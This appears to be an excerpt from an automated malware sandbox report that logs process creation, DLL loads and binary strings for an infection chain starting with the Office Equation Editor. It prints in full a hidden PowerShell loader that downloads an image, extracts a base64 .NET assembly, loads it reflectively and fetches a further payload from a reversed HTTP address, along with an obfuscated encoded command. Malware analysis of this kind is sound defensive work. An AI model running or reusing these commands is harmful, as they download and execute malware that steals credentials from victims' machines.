            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
            Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: riched32.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: find.exe, 0000000D.00000002.621202000.000000000278C000.00000004.10000000.00040000.00000000.sdmp, find.exe, 0000000D.00000002.620947372.000000000056B000.00000004.00000020.00020000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.480001579.0000000002B6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.521681505.000000000084C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000D.00000003.466622226.0000000001EC0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621026297.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 0000000D.00000003.466090226.0000000001D60000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621026297.0000000002050000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000A.00000002.445038073.0000000003789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.447160386.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
